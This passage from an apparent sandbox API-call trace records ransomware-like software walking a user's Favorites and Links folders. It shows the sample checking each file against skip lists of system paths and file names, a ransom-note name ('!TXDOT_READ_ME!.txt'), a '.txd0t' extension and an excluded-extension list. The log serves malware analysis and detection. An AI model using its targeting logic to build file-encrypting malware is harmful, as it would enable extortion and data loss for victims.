(lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="cryptolocker") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="ransomware") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\WINDOWS") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files") returned 0x0 [0129.560] GetProcessHeap () returned 0xe30000 [0129.560] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed39f8 [0129.560] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0129.560] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\*") returned="C:\\Users\\FD1HVy\\Favorites\\*" [0129.560] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.560] StrCmpW (psz1=".", psz2=".") returned 0 [0129.560] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.560] StrCmpW (psz1="..", psz2=".") returned 1 [0129.560] StrCmpW (psz1="..", psz2="..") returned 0 [0129.561] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0129.561] StrCmpW (psz1="Bing.url", psz2=".") returned 1 [0129.561] StrCmpW (psz1="Bing.url", psz2="..") returned 1 [0129.561] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0129.561] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0129.561] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Bing.url", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Bing.url") returned="C:\\Users\\FD1HVy\\Favorites\\Bing.url" [0129.561] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0129.561] StrCmpW (psz1=".url", psz2=".txd0t") returned 1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="bootsect.bak") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="iconcache.db") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="thumbs.db") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2=" ransomware ") returned 1 [0129.561] StrCmpIW (psz1="Bing.url", psz2=" ransom ") returned 1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="debug.txt") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="boot.ini") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="desktop.ini") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="autorun.inf") returned 1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="ntuser.dat") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="ntldr") returned -1 [0129.561] StrCmpIW (psz1="Bing.url", psz2="ntdetect.com") returned -1 [0129.562] StrCmpIW (psz1="Bing.url", psz2="bootfont.bin") returned -1 [0129.562] StrCmpIW (psz1="Bing.url", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.562] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0129.562] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".url") returned=".url|.mui" [0129.562] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.562] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.562] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.562] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0129.562] StrCmpW (psz1="Links", psz2=".") returned 1 [0129.562] StrCmpW (psz1="Links", psz2="..") returned 1 [0129.562] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0129.562] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0129.562] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Links", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\boot\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\programdata\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\drivers\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\wsus\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="crypt_detect") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="cryptolocker") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="ransomware") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0129.562] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.563] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files") returned 0x0 [0129.563] GetProcessHeap () returned 0xe30000 [0129.563] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xed90d0 [0129.563] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Favorites\\Links", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0129.563] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\Links", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links\\*") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\*" [0129.563] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.563] StrCmpW (psz1=".", psz2=".") returned 0 [0129.563] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.563] StrCmpW (psz1="..", psz2=".") returned 1 [0129.563] StrCmpW (psz1="..", psz2="..") returned 0 [0129.563] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.563] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.563] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.563] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.563] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.563] GetProcessHeap () returned 0xe30000 [0129.563] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.563] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0129.563] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.563] GetProcessHeap () returned 0xe30000 [0129.563] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.563] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0129.563] StrCmpW (psz1="Links", psz2=".") returned 1 [0129.563] StrCmpW (psz1="Links", psz2="..") returned 1 [0129.563] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.563] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.563] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Links", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0129.563] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\boot\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\programdata\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\drivers\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\wsus\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="crypt_detect") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="cryptolocker") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="ransomware") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.564] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files") returned 0x0 [0129.564] GetProcessHeap () returned 0xe30000 [0129.564] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed39f8 [0129.564] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0129.564] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\*") returned="C:\\Users\\FD1HVy\\Links\\*" [0129.564] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.564] StrCmpW (psz1=".", psz2=".") returned 0 [0129.564] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.564] StrCmpW (psz1="..", psz2=".") returned 1 [0129.564] StrCmpW (psz1="..", psz2="..") returned 0 [0129.564] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcee4480b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.564] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.565] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.565] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4428f2bb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4428f2bb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce90d59d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0129.565] StrCmpW (psz1="Desktop.lnk", psz2=".") returned 1 [0129.565] StrCmpW (psz1="Desktop.lnk", psz2="..") returned 1 [0129.565] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0129.565] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0129.565] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Desktop.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Desktop.lnk") returned="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" [0129.565] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0129.565] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="bootsect.bak") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="iconcache.db") returned -1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="thumbs.db") returned -1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2=" ransomware ") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2=" ransom ") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="debug.txt") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="boot.ini") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="desktop.ini") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="autorun.inf") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="ntuser.dat") returned -1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="ntldr") returned -1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="ntdetect.com") returned -1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="bootfont.bin") returned 1 [0129.565] StrCmpIW (psz1="Desktop.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.565] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0129.565] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0129.565] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b54f3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x442b54f3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcec7abde, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0129.565] StrCmpW (psz1="Downloads.lnk", psz2=".") returned 1 [0129.565] StrCmpW (psz1="Downloads.lnk", psz2="..") returned 1 [0129.565] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0129.565] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0129.565] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Downloads.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Downloads.lnk") returned="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" [0129.565] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0129.565] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0129.565] StrCmpIW (psz1="Downloads.lnk", psz2="bootsect.bak") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="iconcache.db") returned -1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="thumbs.db") returned -1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2=" ransomware ") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2=" ransom ") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="debug.txt") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="boot.ini") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="desktop.ini") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="autorun.inf") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="ntuser.dat") returned -1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="ntldr") returned -1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="ntdetect.com") returned -1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="bootfont.bin") returned 1 [0129.566] StrCmpIW (psz1="Downloads.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.566] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0129.566] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0129.566] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, 